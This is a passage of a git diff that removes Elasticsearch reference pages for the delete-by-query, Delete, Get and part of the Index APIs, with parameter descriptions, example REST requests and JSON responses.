Unlike the delete API, it does not support -`wait_for`. - -[[docs-delete-by-query-task-api]] -===== Running delete by query asynchronously - -If the request contains `wait_for_completion=false`, {es} -performs some preflight checks, launches the request, and returns a -<> you can use to cancel or get the status of the task. {es} creates a -record of this task as a document at `.tasks/task/${taskId}`. When you are -done with a task, you should delete the task document so {es} can reclaim the -space. - -===== Waiting for active shards - -`wait_for_active_shards` controls how many copies of a shard must be active -before proceeding with the request. See <> -for details. `timeout` controls how long each write request waits for unavailable -shards to become available. Both work exactly the way they work in the -<>. Delete by query uses scrolled searches, so you can also -specify the `scroll` parameter to control how long it keeps the search context -alive, for example `?scroll=10m`. The default is 5 minutes. - -===== Throttling delete requests - -To control the rate at which delete by query issues batches of delete operations, -you can set `requests_per_second` to any positive decimal number. This pads each -batch with a wait time to throttle the rate. Set `requests_per_second` to `-1` -to disable throttling. - -Throttling uses a wait time between batches so that the internal scroll requests -can be given a timeout that takes the request padding into account. The padding -time is the difference between the batch size divided by the -`requests_per_second` and the time spent writing. By default the batch size is -`1000`, so if `requests_per_second` is set to `500`: - -[source,txt] --------------------------------------------------- -target_time = 1000 / 500 per second = 2 seconds -wait_time = target_time - write_time = 2 seconds - .5 seconds = 1.5 seconds --------------------------------------------------- - -Since the batch is issued as a single `_bulk` request, large batch sizes -cause {es} to create many requests and wait before starting the next set. -This is "bursty" instead of "smooth". - -[[docs-delete-by-query-slice]] -===== Slicing - -Delete by query supports <> to parallelize the -delete process. This can improve efficiency and provide a -convenient way to break the request down into smaller parts. - -Setting `slices` to `auto` chooses a reasonable number for most data streams and indices. -If you're slicing manually or otherwise tuning automatic slicing, keep in mind -that: - -* Query performance is most efficient when the number of `slices` is equal to -the number of shards in the index or backing index. If that number is large (for example, -500), choose a lower number as too many `slices` hurts performance. Setting -`slices` higher than the number of shards generally does not improve efficiency -and adds overhead. - -* Delete performance scales linearly across available resources with the -number of slices. - -Whether query or delete performance dominates the runtime depends on the -documents being reindexed and cluster resources. - -[[docs-delete-by-query-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to search. -Wildcard (`*`) expressions are supported. -+ -To search all data streams or indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[docs-delete-by-query-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyzer] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyze_wildcard] - -`conflicts`:: - (Optional, string) What to do if delete by query hits version conflicts: - `abort` or `proceed`. Defaults to `abort`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=default_operator] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=df] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=from] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=lenient] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=max_docs] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-q] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=request_cache] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=requests_per_second] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -`scroll`:: -(Optional, <>) -Period to retain the <> for scrolling. See -<>. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=scroll_size] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search_type] - -`search_timeout`:: -(Optional, <>) -Explicit timeout for each search request. -Defaults to no timeout. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=slices] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=sort] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=stats] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=terminate_after] - -`timeout`:: -(Optional, <>) -Period each deletion request <>. Defaults to `1m` (one minute). - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version] - -include::{docdir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -[[docs-delete-by-query-api-request-body]] -==== {api-request-body-title} - -`query`:: - (Optional, <>) Specifies the documents to delete - using the <>. - - -[[docs-delete-by-query-api-response-body]] -==== Response body - -////////////////////////// - -[source,console] --------------------------------------------------- -POST /my-index-000001/_delete_by_query -{ - "query": { <1> - "match": { - "user.id": "elkbee" - } - } -} --------------------------------------------------- -// TEST[setup:my_index_big] - -////////////////////////// - -The JSON response looks like this: - -[source,console-result] --------------------------------------------------- -{ - "took" : 147, - "timed_out": false, - "total": 119, - "deleted": 119, - "batches": 1, - "version_conflicts": 0, - "noops": 0, - "retries": { - "bulk": 0, - "search": 0 - }, - "throttled_millis": 0, - "requests_per_second": -1.0, - "throttled_until_millis": 0, - "failures" : [ ] -} --------------------------------------------------- -// TESTRESPONSE[s/: [0-9]+/: $body.$_path/] - -`took`:: - -The number of milliseconds from start to end of the whole operation. - -`timed_out`:: - -This flag is set to `true` if any of the requests executed during the -delete by query execution has timed out. - -`total`:: - -The number of documents that were successfully processed. - -`deleted`:: - -The number of documents that were successfully deleted. - -`batches`:: - -The number of scroll responses pulled back by the delete by query. - -`version_conflicts`:: - -The number of version conflicts that the delete by query hit. - -`noops`:: - -This field is always equal to zero for delete by query. It only exists -so that delete by query, update by query, and reindex APIs return responses - with the same structure. - -`retries`:: - -The number of retries attempted by delete by query. `bulk` is the number -of bulk actions retried, and `search` is the number of search actions retried. - -`throttled_millis`:: - -Number of milliseconds the request slept to conform to `requests_per_second`. - -`requests_per_second`:: - -The number of requests per second effectively executed during the delete by query. - -`throttled_until_millis`:: - -This field should always be equal to zero in a `_delete_by_query` response. It only -has meaning when using the <>, where it -indicates the next time (in milliseconds since epoch) a throttled request will be -executed again in order to conform to `requests_per_second`. - -`failures`:: - -Array of failures if there were any unrecoverable errors during the process. If -this is non-empty then the request aborted because of those failures. -Delete by query is implemented using batches, and any failure causes the entire -process to abort but all failures in the current batch are collected into the -array. You can use the `conflicts` option to prevent reindex from aborting on -version conflicts. - -[[docs-delete-by-query-api-example]] -==== {api-examples-title} - -Delete all documents from the `my-index-000001` data stream or index: - -[source,console] --------------------------------------------------- -POST my-index-000001/_delete_by_query?conflicts=proceed -{ - "query": { - "match_all": {} - } -} --------------------------------------------------- -// TEST[setup:my_index] - -Delete documents from multiple data streams or indices: - -[source,console] --------------------------------------------------- -POST /my-index-000001,my-index-000002/_delete_by_query -{ - "query": { - "match_all": {} - } -} --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - -Limit the delete by query operation to shards that a particular routing -value: - -[source,console] --------------------------------------------------- -POST my-index-000001/_delete_by_query?routing=1 -{ - "query": { - "range" : { - "age" : { - "gte" : 10 - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -By default `_delete_by_query` uses scroll batches of 1000. You can change the -batch size with the `scroll_size` URL parameter: - -[source,console] --------------------------------------------------- -POST my-index-000001/_delete_by_query?scroll_size=5000 -{ - "query": { - "term": { - "user.id": "kimchy" - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[docs-delete-by-query-manual-slice]] -===== Slice manually - -Slice a delete by query manually by providing a slice id and total number of -slices: - -[source,console] ----------------------------------------------------------------- -POST my-index-000001/_delete_by_query -{ - "slice": { - "id": 0, - "max": 2 - }, - "query": { - "range": { - "http.response.bytes": { - "lt": 2000000 - } - } - } -} -POST my-index-000001/_delete_by_query -{ - "slice": { - "id": 1, - "max": 2 - }, - "query": { - "range": { - "http.response.bytes": { - "lt": 2000000 - } - } - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -Which you can verify works with: - -[source,console] ----------------------------------------------------------------- -GET _refresh -POST my-index-000001/_search?size=0&filter_path=hits.total -{ - "query": { - "range": { - "http.response.bytes": { - "lt": 2000000 - } - } - } -} ----------------------------------------------------------------- -// TEST[continued] - -Which results in a sensible `total` like this one: - -[source,console-result] ----------------------------------------------------------------- -{ - "hits": { - "total" : { - "value": 0, - "relation": "eq" - } - } -} ----------------------------------------------------------------- - -[discrete] -[[docs-delete-by-query-automatic-slice]] -===== Use automatic slicing - -You can also let delete-by-query automatically parallelize using -<> to slice on `_id`. Use `slices` to specify -the number of slices to use: - -[source,console] ----------------------------------------------------------------- -POST my-index-000001/_delete_by_query?refresh&slices=5 -{ - "query": { - "range": { - "http.response.bytes": { - "lt": 2000000 - } - } - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -Which you also can verify works with: - -[source,console] ----------------------------------------------------------------- -POST my-index-000001/_search?size=0&filter_path=hits.total -{ - "query": { - "range": { - "http.response.bytes": { - "lt": 2000000 - } - } - } -} ----------------------------------------------------------------- -// TEST[continued] - -Which results in a sensible `total` like this one: - -[source,console-result] ----------------------------------------------------------------- -{ - "hits": { - "total" : { - "value": 0, - "relation": "eq" - } - } -} ----------------------------------------------------------------- - -Setting `slices` to `auto` will let {es} choose the number of slices -to use. This setting will use one slice per shard, up to a certain limit. If -there are multiple source data streams or indices, it will choose the number of slices based -on the index or backing index with the smallest number of shards. - -Adding `slices` to `_delete_by_query` just automates the manual process used in -the section above, creating sub-requests which means it has some quirks: - -* You can see these requests in the -<>. These sub-requests are "child" -tasks of the task for the request with `slices`. -* Fetching the status of the task for the request with `slices` only contains -the status of completed slices. -* These sub-requests are individually addressable for things like cancellation -and rethrottling. -* Rethrottling the request with `slices` will rethrottle the unfinished -sub-request proportionally. -* Canceling the request with `slices` will cancel each sub-request. -* Due to the nature of `slices` each sub-request won't get a perfectly even -portion of the documents. All documents will be addressed, but some slices may -be larger than others. Expect larger slices to have a more even distribution. -* Parameters like `requests_per_second` and `max_docs` on a request with -slices` are distributed proportionally to each sub-request. Combine that with -the point above about distribution being uneven and you should conclude that -using `max_docs` with `slices` might not result in exactly `max_docs` documents -being deleted. -* Each sub-request gets a slightly different snapshot of the source data stream or index -though these are all taken at approximately the same time. - -[discrete] -[[docs-delete-by-query-rethrottle]] -===== Change throttling for a request - -The value of `requests_per_second` can be changed on a running delete by query -using the `_rethrottle` API. Rethrottling that speeds up the -query takes effect immediately but rethrotting that slows down the query -takes effect after completing the current batch to prevent scroll -timeouts. - -[source,console] --------------------------------------------------- -POST _delete_by_query/r1A2WoRbTwKZ516z6NEs5A:36619/_rethrottle?requests_per_second=-1 --------------------------------------------------- - -Use the <> to get the task ID. Set `requests_per_second` -to any positive decimal value or `-1` to disable throttling. - -===== Get the status of a delete by query operation - -Use the <> to get the status of a delete by query -operation: - - -[source,console] --------------------------------------------------- -GET _tasks?detailed=true&actions=*/delete/byquery --------------------------------------------------- -// TEST[skip:No tasks to retrieve] - -The response looks like: - -[source,console-result] --------------------------------------------------- -{ - "nodes" : { - "r1A2WoRbTwKZ516z6NEs5A" : { - "name" : "r1A2WoR", - "transport_address" : "127.0.0.1:9300", - "host" : "127.0.0.1", - "ip" : "127.0.0.1:9300", - "attributes" : { - "testattr" : "test", - "portsfile" : "true" - }, - "tasks" : { - "r1A2WoRbTwKZ516z6NEs5A:36619" : { - "node" : "r1A2WoRbTwKZ516z6NEs5A", - "id" : 36619, - "type" : "transport", - "action" : "indices:data/write/delete/byquery", - "status" : { <1> - "total" : 6154, - "updated" : 0, - "created" : 0, - "deleted" : 3500, - "batches" : 36, - "version_conflicts" : 0, - "noops" : 0, - "retries": 0, - "throttled_millis": 0 - }, - "description" : "" - } - } - } - } -} --------------------------------------------------- - -<1> This object contains the actual status. It is just like the response JSON -with the important addition of the `total` field. `total` is the total number -of operations that the reindex expects to perform. You can estimate the -progress by adding the `updated`, `created`, and `deleted` fields. The request -will finish when their sum is equal to the `total` field. - -With the task id you can look up the task directly: - -[source,console] --------------------------------------------------- -GET /_tasks/r1A2WoRbTwKZ516z6NEs5A:36619 --------------------------------------------------- -// TEST[catch:missing] - -The advantage of this API is that it integrates with `wait_for_completion=false` -to transparently return the status of completed tasks. If the task is completed -and `wait_for_completion=false` was set on it then it'll come back with -`results` or an `error` field. The cost of this feature is the document that -`wait_for_completion=false` creates at `.tasks/task/${taskId}`. It is up to -you to delete that document. - - -[discrete] -[[docs-delete-by-query-cancel-task-api]] -===== Cancel a delete by query operation - -Any delete by query can be canceled using the <>: - -[source,console] --------------------------------------------------- -POST _tasks/r1A2WoRbTwKZ516z6NEs5A:36619/_cancel --------------------------------------------------- - -The task ID can be found using the <>. - -Cancellation should happen quickly but might take a few seconds. The task status -API above will continue to list the delete by query task until this task checks that it -has been cancelled and terminates itself. diff --git a/docs/reference/docs/delete.asciidoc b/docs/reference/docs/delete.asciidoc deleted file mode 100644 index 04d70a1d1be..00000000000 --- a/docs/reference/docs/delete.asciidoc +++ /dev/null @@ -1,208 +0,0 @@ -[[docs-delete]] -=== Delete API -++++ -Delete -++++ - -Removes a JSON document from the specified index. - -[[docs-delete-api-request]] -==== {api-request-title} - -`DELETE //_doc/<_id>` - -[[docs-delete-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `delete` or -`write` <> for the target index or -index alias. - -[[docs-delete-api-desc]] -==== {api-description-title} - -You use DELETE to remove a document from an index. You must specify the -index name and document ID. - -NOTE: You cannot send deletion requests directly to a data stream. To delete a -document in a data stream, you must target the backing index containing the -document. See <>. - -[discrete] -[[optimistic-concurrency-control-delete]] -===== Optimistic concurrency control - -Delete operations can be made conditional and only be performed if the last -modification to the document was assigned the sequence number and primary -term specified by the `if_seq_no` and `if_primary_term` parameters. If a -mismatch is detected, the operation will result in a `VersionConflictException` -and a status code of 409. See <> for more details. - -[discrete] -[[delete-versioning]] -===== Versioning - -Each document indexed is versioned. When deleting a document, the `version` can -be specified to make sure the relevant document we are trying to delete is -actually being deleted and it has not changed in the meantime. Every write -operation executed on a document, deletes included, causes its version to be -incremented. The version number of a deleted document remains available for a -short time after deletion to allow for control of concurrent operations. The -length of time for which a deleted document's version remains available is -determined by the `index.gc_deletes` index setting and defaults to 60 seconds. - -[discrete] -[[delete-routing]] -===== Routing - -If routing is used during indexing, the routing value also needs to be -specified to delete a document. - -If the `_routing` mapping is set to `required` and no routing value is -specified, the delete API throws a `RoutingMissingException` and rejects -the request. - -For example: - - -//// -Example to delete with routing - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_doc/1?routing=shard-1 -{ - "test": "test" -} --------------------------------------------------- -//// - - -[source,console] --------------------------------------------------- -DELETE /my-index-000001/_doc/1?routing=shard-1 --------------------------------------------------- -// TEST[continued] - -This request deletes the document with id `1`, but it is routed based on the -user. The document is not deleted if the correct routing is not specified. - -[discrete] -[[delete-index-creation]] -===== Automatic index creation - -If an <> is used, -the delete operation automatically creates the specified index if it does not -exist. For information about manually creating indices, see -<>. - -[discrete] -[[delete-distributed]] -===== Distributed - -The delete operation gets hashed into a specific shard id. It then gets -redirected into the primary shard within that id group, and replicated -(if needed) to shard replicas within that id group. - -[discrete] -[[delete-wait-for-active-shards]] -===== Wait for active shards - -When making delete requests, you can set the `wait_for_active_shards` -parameter to require a minimum number of shard copies to be active -before starting to process the delete request. See -<> for further details and a usage -example. - -[discrete] -[[delete-refresh]] -===== Refresh - -Control when the changes made by this request are visible to search. See -<>. - -[discrete] -[[delete-timeout]] -===== Timeout - -The primary shard assigned to perform the delete operation might not be -available when the delete operation is executed. Some reasons for this -might be that the primary shard is currently recovering from a store -or undergoing relocation. By default, the delete operation will wait on -the primary shard to become available for up to 1 minute before failing -and responding with an error. The `timeout` parameter can be used to -explicitly specify how long it waits. Here is an example of setting it -to 5 minutes: - -[source,console] --------------------------------------------------- -DELETE /my-index-000001/_doc/1?timeout=5m --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-delete-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) Name of the target index. - -`<_id>`:: -(Required, string) Unique identifier for the document. - -[[docs-delete-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=if_seq_no] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=if_primary_term] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=pipeline] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -`timeout`:: -(Optional, <>) -Period to <>. Defaults to -`1m` (one minute). - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=doc-version] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version_type] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -[[docs-delete-api-example]] -==== {api-examples-title} - -Delete the JSON document `1` from the `my-index-000001` index: - -[source,console] --------------------------------------------------- -DELETE /my-index-000001/_doc/1 --------------------------------------------------- -// TEST[setup:my_index] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "failed": 0, - "successful": 2 - }, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_version": 2, - "_primary_term": 1, - "_seq_no": 5, - "result": "deleted" -} --------------------------------------------------- -// TESTRESPONSE[s/"successful": 2/"successful": 1/] -// TESTRESPONSE[s/"_primary_term": 1/"_primary_term": $body._primary_term/] -// TESTRESPONSE[s/"_seq_no": 5/"_seq_no": $body._seq_no/] diff --git a/docs/reference/docs/get.asciidoc b/docs/reference/docs/get.asciidoc deleted file mode 100644 index 2ce71c2692f..00000000000 --- a/docs/reference/docs/get.asciidoc +++ /dev/null @@ -1,429 +0,0 @@ -[[docs-get]] -=== Get API -++++ -Get -++++ - -Retrieves the specified JSON document from an index. - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/0 --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-get-api-request]] -==== {api-request-title} - -`GET /_doc/<_id>` - -`HEAD /_doc/<_id>` - -`GET /_source/<_id>` - -`HEAD /_source/<_id>` - -[[docs-get-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `read` -<> for the target index or index alias. - -[[docs-get-api-desc]] -==== {api-description-title} -You use GET to retrieve a document and its source or stored fields from a -particular index. Use HEAD to verify that a document exists. You can -use the `_source` resource retrieve just the document source or verify -that it exists. - -[discrete] -[[realtime]] -===== Realtime - -By default, the get API is realtime, and is not affected by the refresh -rate of the index (when data will become visible for search). In case where -stored fields are requested (see `stored_fields` parameter) and the document -has been updated but is not yet refreshed, the get API will have to parse -and analyze the source to extract the stored fields. In order to disable -realtime GET, the `realtime` parameter can be set to `false`. - -[discrete] -[[get-source-filtering]] -===== Source filtering - -By default, the get operation returns the contents of the `_source` field unless -you have used the `stored_fields` parameter or if the `_source` field is disabled. -You can turn off `_source` retrieval by using the `_source` parameter: - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/0?_source=false --------------------------------------------------- -// TEST[setup:my_index] - -If you only need one or two fields from the `_source`, use the `_source_includes` -or `_source_excludes` parameters to include or filter out particular fields. -This can be especially helpful with large documents where partial retrieval can -save on network overhead. Both parameters take a comma separated list -of fields or wildcard expressions. Example: - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/0?_source_includes=*.id&_source_excludes=entities --------------------------------------------------- -// TEST[setup:my_index] - -If you only want to specify includes, you can use a shorter notation: - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/0?_source=*.id --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[get-routing]] -===== Routing - -If routing is used during indexing, the routing value also needs to be -specified to retrieve a document. For example: - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/2?routing=user1 --------------------------------------------------- -// TEST[continued] - -This request gets the document with id `2`, but it is routed based on the -user. The document is not fetched if the correct routing is not specified. - -[discrete] -[[preference]] -===== Preference - -Controls a `preference` of which shard replicas to execute the get -request on. By default, the operation is randomized between the shard -replicas. - -The `preference` can be set to: - -`_local`:: - The operation will prefer to be executed on a local - allocated shard if possible. - -Custom (string) value:: - A custom value will be used to guarantee that - the same shards will be used for the same custom value. This can help - with "jumping values" when hitting different shards in different refresh - states. A sample value can be something like the web session id, or the - user name. - -[discrete] -[[get-refresh]] -===== Refresh - -The `refresh` parameter can be set to `true` in order to refresh the -relevant shard before the get operation and make it searchable. Setting -it to `true` should be done after careful thought and verification that -this does not cause a heavy load on the system (and slows down -indexing). - -[discrete] -[[get-distributed]] -===== Distributed - -The get operation gets hashed into a specific shard id. It then gets -redirected to one of the replicas within that shard id and returns the -result. The replicas are the primary shard and its replicas within that -shard id group. This means that the more replicas we have, the -better GET scaling we will have. - -[discrete] -[[get-versioning]] -===== Versioning support - -You can use the `version` parameter to retrieve the document only if -its current version is equal to the specified one. - -Internally, Elasticsearch has marked the old document as deleted and added an -entirely new document. The old version of the document doesn’t disappear -immediately, although you won’t be able to access it. Elasticsearch cleans up -deleted documents in the background as you continue to index more data. - -[[docs-get-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) Name of the index that contains the document. - -`<_id>`:: -(Required, string) Unique identifier of the document. - -[[docs-get-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=realtime] - -`refresh`:: -(Optional, Boolean) -If `true`, {es} refreshes the affected shards to make this operation visible to -search. If `false`, do nothing with refreshes. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=stored_fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=doc-version] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version_type] - -[[docs-get-api-response-body]] -==== {api-response-body-title} - -`_index`:: -The name of the index the document belongs to. - -`_type`:: -The document type. {es} indices now support a single document type, `_doc`. - -`_id`:: -The unique identifier for the document. - -`_version`:: -The document version. Incremented each time the document is updated. - -`_seq_no`:: -The sequence number assigned to the document for the indexing -operation. Sequence numbers are used to ensure an older version of a document -doesn’t overwrite a newer version. See <>. - -`_primary_term`:: -The primary term assigned to the document for the indexing operation. -See <>. - -`found`:: -Indicates whether the document exists: `true` or `false`. - -`_routing`:: -The explicit routing, if set. - -'_source':: -If `found` is `true`, contains the document data formatted in JSON. -Excluded if the `_source` parameter is set to `false` or the `stored_fields` -parameter is set to `true`. - -'_fields':: -If the `stored_fields` parameter is set to `true` and `found` is -`true`, contains the document fields stored in the index. - -[[docs-get-api-example]] -==== {api-examples-title} - -Retrieve the JSON document with the `_id` 0 from the `my-index-000001` index: - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/0 --------------------------------------------------- -// TEST[setup:my_index] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-000001", - "_type": "_doc", - "_id": "0", - "_version": 1, - "_seq_no": 0, - "_primary_term": 1, - "found": true, - "_source": { - "@timestamp": "2099-11-15T14:12:12", - "http": { - "request": { - "method": "get" - }, - "response": { - "status_code": 200, - "bytes": 1070000 - }, - "version": "1.1" - }, - "source": { - "ip": "127.0.0.1" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no": $body._seq_no/ s/"_primary_term": 1/"_primary_term": $body._primary_term/] - -Check to see if a document with the `_id` 0 exists: - -[source,console] --------------------------------------------------- -HEAD my-index-000001/_doc/0 --------------------------------------------------- -// TEST[setup:my_index] - -{es} returns a status code of `200 - OK` if the document exists, or -`404 - Not Found` if it doesn't. - -[discrete] -[[_source]] -===== Get the source field only - -Use the `/_source/` resource to get -just the `_source` field of a document. For example: - -[source,console] --------------------------------------------------- -GET my-index-000001/_source/1 --------------------------------------------------- -// TEST[continued] - -You can use the source filtering parameters to control which parts of the -`_source` are returned: - -[source,console] --------------------------------------------------- -GET my-index-000001/_source/1/?_source_includes=*.id&_source_excludes=entities --------------------------------------------------- -// TEST[continued] - -You can use HEAD with the `_source` endpoint to efficiently -test whether or not the document _source exists. A document's source is not -available if it is disabled in the <>. - -[source,console] --------------------------------------------------- -HEAD my-index-000001/_source/1 --------------------------------------------------- -// TEST[continued] - -[discrete] -[[get-stored-fields]] -===== Get stored fields - -Use the `stored_fields` parameter to specify the set of stored fields you want -to retrieve. Any requested fields that are not stored are ignored. -Consider for instance the following mapping: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "counter": { - "type": "integer", - "store": false - }, - "tags": { - "type": "keyword", - "store": true - } - } - } -} --------------------------------------------------- - -Now we can add a document: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "counter": 1, - "tags": [ "production" ] -} --------------------------------------------------- -// TEST[continued] - -And then try to retrieve it: - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/1?stored_fields=tags,counter --------------------------------------------------- -// TEST[continued] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_version": 1, - "_seq_no" : 22, - "_primary_term" : 1, - "found": true, - "fields": { - "tags": [ - "production" - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - -Field values fetched from the document itself are always returned as an array. -Since the `counter` field is not stored, the get request ignores it. - -You can also retrieve metadata fields like the `_routing` field: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/2?routing=user1 -{ - "counter" : 1, - "tags" : ["env2"] -} --------------------------------------------------- -// TEST[continued] - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/2?routing=user1&stored_fields=tags,counter --------------------------------------------------- -// TEST[continued] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-000001", - "_type": "_doc", - "_id": "2", - "_version": 1, - "_seq_no" : 13, - "_primary_term" : 1, - "_routing": "user1", - "found": true, - "fields": { - "tags": [ - "env2" - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - -Only leaf fields can be retrieved with the `stored_field` option. Object fields -can't be returned--if specified, the request fails. diff --git a/docs/reference/docs/index_.asciidoc b/docs/reference/docs/index_.asciidoc deleted file mode 100644 index 40575db62a0..00000000000 --- a/docs/reference/docs/index_.asciidoc +++ /dev/null @@ -1,621 +0,0 @@ -[[docs-index_]] -=== Index API -++++ -Index -++++ - -IMPORTANT: See <>. - -Adds a JSON document to the specified data stream or index and makes -it searchable. If the target is an index and the document already exists, -the request updates the document and increments its version. - -NOTE: You cannot use the index API to send update requests for existing -documents to a data stream. See <> -and <>. - -[[docs-index-api-request]] -==== {api-request-title} - -`PUT //_doc/<_id>` - -`POST //_doc/` - -`PUT //_create/<_id>` - -`POST //_create/<_id>` - -IMPORTANT: You cannot add new documents to a data stream using the -`PUT //_doc/<_id>` request format. To specify a document ID, use the -`PUT //_create/<_id>` format instead. See -<>. - -[[docs-index-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the following -<> for the target data stream, index, -or index alias: - -** To add or overwrite a document using the `PUT //_doc/<_id>` request -format, you must have the `create`, `index`, or `write` index privilege. - -** To add a document using the `POST //_doc/`, -`PUT //_create/<_id>`, or `POST //_create/<_id>` request -formats, you must have the `create_doc`, `create`, `index`, or `write` index -privilege. - -** To automatically create a data stream or index with an index API request, you -must have the `auto_configure`, `create_index`, or `manage` index privilege. - -* Automatic data stream creation requires a matching index template with data -stream enabled. See <>. - -[[docs-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) Name of the data stream or index to target. -+ -If the target doesn't exist and matches the name or wildcard (`*`) pattern of an -<>, this request creates the data stream. See -<>. -+ -If the target doesn't exist and doesn't match a data stream template, -this request creates the index. -+ -You can check for existing targets using the resolve index API. - -`<_id>`:: -(Optional, string) Unique identifier for the document. -+ --- -This parameter is required for the following request formats: - -* `PUT //_doc/<_id>` -* `PUT //_create/<_id>` -* `POST //_create/<_id>` - -To automatically generate a document ID, use the `POST //_doc/` request -format and omit this parameter. --- - - - -[[docs-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=if_seq_no] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=if_primary_term] - -[[docs-index-api-op_type]] -`op_type`:: -(Optional, enum) Set to `create` to only index the document -if it does not already exist (_put if absent_). If a document with the specified -`_id` already exists, the indexing operation will fail. Same as using the -`/_create` endpoint. Valid values: `index`, `create`. -If document id is specified, it defaults to `index`. Otherwise, it defaults to `create`. -+ -NOTE: If the request targets a data stream, an `op_type` of `create` is -required. See <>. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=pipeline] - 